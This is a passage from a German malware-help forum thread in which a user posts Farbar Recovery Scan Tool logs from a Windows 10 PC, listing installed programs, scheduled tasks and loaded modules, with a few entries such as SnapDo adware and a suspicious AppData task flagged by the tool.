2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-11-10 07:18 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-11-10 07:14 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-11-09 23:02 - 2015-12-22 22:59 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-09 23:00 - 2016-10-19 06:16 - 00000000 ____D C:\Program Files (x86)\Cimatron
2016-11-09 22:45 - 2016-08-28 16:12 - 00000000 ____D C:\Users\Patrick\AppData\Roaming\vlc
2016-11-08 22:14 - 2015-12-23 02:16 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-11-08 22:11 - 2015-12-23 02:16 - 141011376 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-11-06 23:44 - 2016-10-19 06:16 - 00000215 _____ C:\WINDOWS\CimLicManager.INI
2016-11-06 23:39 - 2015-12-22 22:33 - 00000000 ____D C:\Users\Patrick\AppData\Local\Google
2016-11-06 23:21 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\setup
2016-11-06 17:39 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\system32\spool
2016-11-06 17:37 - 2016-10-19 06:10 - 00000000 ____D C:\Program Files\Cimatron
2016-11-06 17:22 - 2015-12-22 17:15 - 00000000 ____D C:\Users\Patrick\HUK24

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-05-10 19:36 - 2016-05-10 19:36 - 0000004 _____ () C:\Users\Patrick\AppData\Roaming\Microsoft\notaut.txt
2015-12-31 01:56 - 2016-01-04 00:01 - 0007605 _____ () C:\Users\Patrick\AppData\Local\Resmon.ResmonCfg
2016-09-24 16:26 - 2016-09-24 16:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-01-19 22:14 - 2016-11-24 21:18 - 0001534 _____ () C:\ProgramData\ss.ini

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\Users\Patrick\cc_20161001_142046.reg


Einige Dateien in TEMP:
====================
C:\Users\Jia\AppData\Local\Temp\avgnt.exe


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2016-11-25 20:55

==================== Ende von FRST.txt ============================

Machalla666 05.12.2016 17:16
Und hier Addition.txt:
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-12-2016
durchgeführt von Patrick (05-12-2016 17:11:05)
Gestartet von C:\Users\Patrick\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-24 15:36:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3097098544-2319845998-2187571786-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3097098544-2319845998-2187571786-503 - Limited - Disabled)
Gast (S-1-5-21-3097098544-2319845998-2187571786-501 - Limited - Disabled)
Patrick (S-1-5-21-3097098544-2319845998-2187571786-1001 - Administrator - Enabled) => C:\Users\Patrick

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.020.20042 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 23.0.0.257 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Ansel (Version: 375.95 - NVIDIA Corporation) Hidden
Broadcom Card Reader Driver Installer (HKLM\...\{67AA948F-8D83-4566-B84A-7CAABCF64E3F}) (Version: 16.0.2.8 - Broadcom Corporation)
Cavern Kings (HKLM-x32\...\Steam App 321830) (Version:  - Vine)
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
Course Vector .minerva (HKLM-x32\...\com.coursevector.minerva) (Version: 3.5.0 - UNKNOWN)
Course Vector .minerva (x32 Version: 3.5.0 - UNKNOWN) Hidden
CrossCode (HKLM\...\Steam App 368340) (Version:  - Radical Fish Games)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0196 - Disc Soft Ltd)
Death Road to Canada (HKLM\...\Steam App 252610) (Version:  - Rocketcat Games)
Deathstate (HKLM-x32\...\Steam App 402120) (Version:  - Workinman Interactive, LLC.)
DLC Quest (HKLM\...\Steam App 230050) (Version:  - Going Loud Studios)
Dritek Radio Controller (HKLM-x32\...\RadioController) (Version: 2.02.2001.0803 - Dritek System Inc.)
Dungeon Souls (HKLM-x32\...\Steam App 383230) (Version:  - Mike Studios)
ELAN Touchpad 11.15.0.18_X64 (HKLM\...\Elantech) (Version: 11.15.0.18 - ELAN Microelectronic Corp.)
Extended Asian Language font pack for Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-2530-0000-AC0F074E4100}) (Version: 15.007.20033 - Adobe Systems Incorporated)
FreeCAD 0.15 - A free open source CAD system (HKLM\...\FreeCAD 0.15) (Version: 0.15.4671 - Juergen Riegel)
Ghost 1.0 (HKLM\...\Steam App 463270) (Version:  - @unepic_fran)
Good Robot (HKLM\...\Steam App 358830) (Version:  - Pyrodactyl)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Hammerwatch (HKLM\...\Steam App 239070) (Version:  - Crackshell)
Hero Siege (HKLM-x32\...\Steam App 269210) (Version:  - Elias Viglione)
HiSuite (HKLM-x32\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd)
Hyper Light Drifter (HKLM\...\Steam App 257850) (Version:  - Heart Machine)
Hyperdimension Neptunia Re;Birth1 (HKLM\...\Steam App 282900) (Version:  - Idea Factory, Inc.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Iron Fisticle (HKLM-x32\...\Steam App 306700) (Version:  - Confused Pelican)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Jets'n'Guns Gold (HKLM\...\Steam App 262260) (Version:  - Rake in Grass)
KeyShot 5 64 bit (HKLM-x32\...\KeyShot 5_64) (Version: 5.0 64 bit - Luxion ApS)
KH Ultra Trainer (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\4f344c4511ef18b2) (Version: 0.1.0.74 - KongHack)
Leap of Fate (HKLM\...\Steam App 363420) (Version:  - Clever-Plays)
Legends of Pixelia (HKLM\...\Steam App 371530) (Version:  - SimaGames)
LINE (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\LINE) (Version: 4.10.2.1257 - LINE Corporation)
Magicians & Looters (HKLM\...\Steam App 284180) (Version:  - Morgopolis Studios)
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Mercenary Kings (HKLM\...\Steam App 218820) (Version:  - Tribute Games Inc.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Rechner-Plus (HKLM-x32\...\{437C19B3-7E20-4E39-B868-CA6BAA820E1C}) (Version: 1.0.0 - Microsoft)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 50.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 50.0.2 (x86 de)) (Version: 50.0.2 - Mozilla)
NFOPad 1.7 (HKLM-x32\...\NFOPad) (Version: 1.7 - True Human Design)
NVIDIA GeForce Experience 3.1.0.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.1.0.52 - NVIDIA Corporation)
NVIDIA Grafiktreiber 375.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 375.95 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.1.0.52 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 1.2.0.0 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PAC-MAN Championship Edition DX+ (HKLM\...\Steam App 236450) (Version:  - Mine Loader Software Co., Ltd.)
Paranautical Activity: Deluxe Atonement Edition (HKLM\...\Steam App 250580) (Version:  - Digerati Distribution)
Phantom Breaker: Battle Grounds (HKLM\...\Steam App 329490) (Version:  - MAGES.)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Princess.Loot.Pixel.Again (HKLM\...\Steam App 414290) (Version:  - EfimovMax)
QQ International (HKLM-x32\...\{3CA54984-A14B-42FE-9FF1-7EA90151D725}) (Version: 1.91.1369.0 - Tencent Technology(Shenzhen) Company Limited)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.305 - Qualcomm Atheros Communications)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 12.05 - Qualcomm Atheros)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Roguelands (HKLM\...\Steam App 364420) (Version:  - SmashGames)
Saints Row IV (HKLM\...\Steam App 206420) (Version:  - Deep Silver Volition)
Saints Row: The Third (HKLM-x32\...\Steam App 55230) (Version:  - Volition)
SDFormatter (HKLM-x32\...\{179324FF-7B16-4BA8-9836-055CAAEE4F08}) (Version: 4.0.0 - SD Association)
SHIELD Streaming (Version: 7.1.0330 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.1.0.52 - NVIDIA Corporation) Hidden
Sid Meier's Civilization V (HKLM\...\Steam App 8930) (Version:  - Firaxis Games)
Sid Meier's Civilization V (HKLM-x32\...\steam app 8930) (Version:  - 2K Games, Inc.)
SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group)
SnapDo (HKLM-x32\...\{B6F4B21E-05B2-4C3C-A415-123F6A8B7CF7}) (Version: 1.0.0.0 - Resoft) <==== ACHTUNG
Solid Edge ST8 (HKLM\...\{C69F7B10-60F2-476C-B0C1-4D61628462B7}) (Version: 108.00.00091 - Siemens)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
Unity Web Player (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\UnityWebPlayer) (Version: 5.3.1f1 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Void Raiders (HKLM\...\Steam App 445600) (Version:  - Tryzna83)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.7.4.0 - Azureus Software, Inc.)
WBFS Manager 3.0 (HKLM-x32\...\WBFS Manager 3.0) (Version: 3.0 - AlexDP)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Witch & Hero(魔女と勇者) (HKLM\...\Steam App 434130) (Version:  - FK Digital)
Yandex (HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\YandexBrowser) (Version: 16.10.1.1114 - YANDEX)
Ziggurat (HKLM-x32\...\Steam App 308420) (Version:  - Milkstone Studios)
シロクロ家出ギャル 泊めてくれたらなんでもするよ (HKLM-x32\...\エルフを飼うオーク「おめぇにゃオラの仔をたぁんと産んでもらうだよ」) (Version: 1.0.0 - α-MODEL)
搜狗拼音输入法 8.1正式版 (HKLM-x32\...\Sogou Input) (Version: 8.1.0.8588 - Sogou.com)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001_Classes\CLSID\{F654F1BF-54D9-4A2E-B703-889091D3CB2D}\InprocServer32 -> c:\cimatron e13\program\cimpreviewhandler.dll => Keine Datei

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0CF6A2CF-4CE5-4A2B-8FA9-4E54567A63ED} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {285F40BD-A904-40FA-951B-ABB14BB69D51} - System32\Tasks\IntelMemoryDiagnostic => C:\Users\Patrick\AppData\Roaming\d3dx10.exe <==== ACHTUNG
Task: {33AB4AFF-944D-474A-AE6F-66B7CF4F8590} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {342309AA-8AD2-46DB-A6EA-5D51C5CE2E77} - System32\Tasks\klcp_update => C:\Program Files\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-11-10] ()
Task: {3CFDDE66-A51F-4118-A971-B2784A2C099E} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe [2016-11-19] (Adobe Systems Incorporated)
Task: {55687776-EE70-4178-BD30-F45518292757} - System32\Tasks\Update for Yandex Browser => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe [2016-11-09] (YANDEX LLC)
Task: {5FEFC0D8-B25C-42C7-B193-C7EC237931F7} - \{6BA690B0-1A65-4FE1-B843-96EDE2B0A4C7} -> Keine Datei <==== ACHTUNG
Task: {62755CD6-6F88-4E68-92CC-12876715E12E} - System32\Tasks\Aktualisierung von Yandex Browser => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe [2016-11-09] (YANDEX LLC)
Task: {7B8ADF7F-61F3-481A-83D1-8974A93B80FD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {88FCB513-78C2-494C-97B8-1C2E1CA04A1B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {8FB13BC2-5CED-434B-ABFC-E8CA8B7A9D4A} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-10-25] (NVIDIA Corporation)
Task: {907420C3-5A7F-4040-91F9-F0F26291B9FC} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-10-25] (NVIDIA Corporation)
Task: {9EE9C5DF-42DC-48AD-88CD-94D1A7A7CECB} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {A78E230A-4226-4614-841C-F6F78BEB70E9} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-10-25] (NVIDIA Corporation)
Task: {A9FD5CD3-9A97-4881-A0BB-7480C51A19E9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-11-08] (Microsoft Corporation)
Task: {BA657DC5-B244-4FF5-BD25-8005343FB1DD} - System32\Tasks\Systemaktualisierung von Yandex Browser => C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe [2016-11-09] (YANDEX LLC)
Task: {C056C44B-8F15-4448-92C2-56E043A73A80} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-10-25] (NVIDIA Corporation)
Task: {D1DCFEBF-0295-4E80-94CF-F369B3C71B4B} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-10-25] (NVIDIA Corporation)
Task: {DECEDBFC-2CA1-4EC6-B86D-83093585DC17} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {EF0AAD5A-2E96-411C-87E4-C07B504C01A8} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-10-25] (NVIDIA Corporation)
Task: {F0AE3619-7E9F-47D2-B095-38C29BBC4059} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWoW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe
Task: C:\WINDOWS\Tasks\Aktualisierung von Yandex Browser.job => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Systemaktualisierung von Yandex Browser.job => C:\Program Files (x86)\Yandex\YandexBrowser\16.10.1.1114\service_update.exe
Task: C:\WINDOWS\Tasks\Update for Yandex Browser.job => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-11-06 17:39 - 2014-06-26 11:55 - 00066480 _____ () C:\WINDOWS\System32\bgspm64.dll
2016-08-26 10:08 - 2016-08-26 10:08 - 00192200 _____ () C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
2016-09-24 16:48 - 2016-10-25 21:21 - 01148984 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-09-24 16:48 - 2016-10-25 21:21 - 04490808 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-09-24 16:48 - 2016-10-25 21:21 - 00420408 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem\_nvspserviceplugin64.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-29 20:12 - 2016-09-15 18:25 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-11-19 03:15 - 2016-11-17 02:03 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-29 20:12 - 2016-09-15 18:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-29 20:12 - 2016-09-15 18:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-24 16:38 - 2016-09-24 16:38 - 00959168 _____ () C:\Users\Patrick\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2014-05-01 15:13 - 2016-11-22 17:47 - 00592384 _____ () C:\Users\Patrick\AppData\Local\MEGAsync\ShellExtX64.dll
2016-09-24 17:22 - 2016-09-24 17:22 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-11-10 06:35 - 2016-11-02 11:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-10 06:35 - 2016-11-02 11:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-10 06:35 - 2016-11-02 11:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-10 06:35 - 2016-11-02 11:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-10 06:35 - 2016-11-02 11:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-11-10 06:35 - 2016-11-02 11:13 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
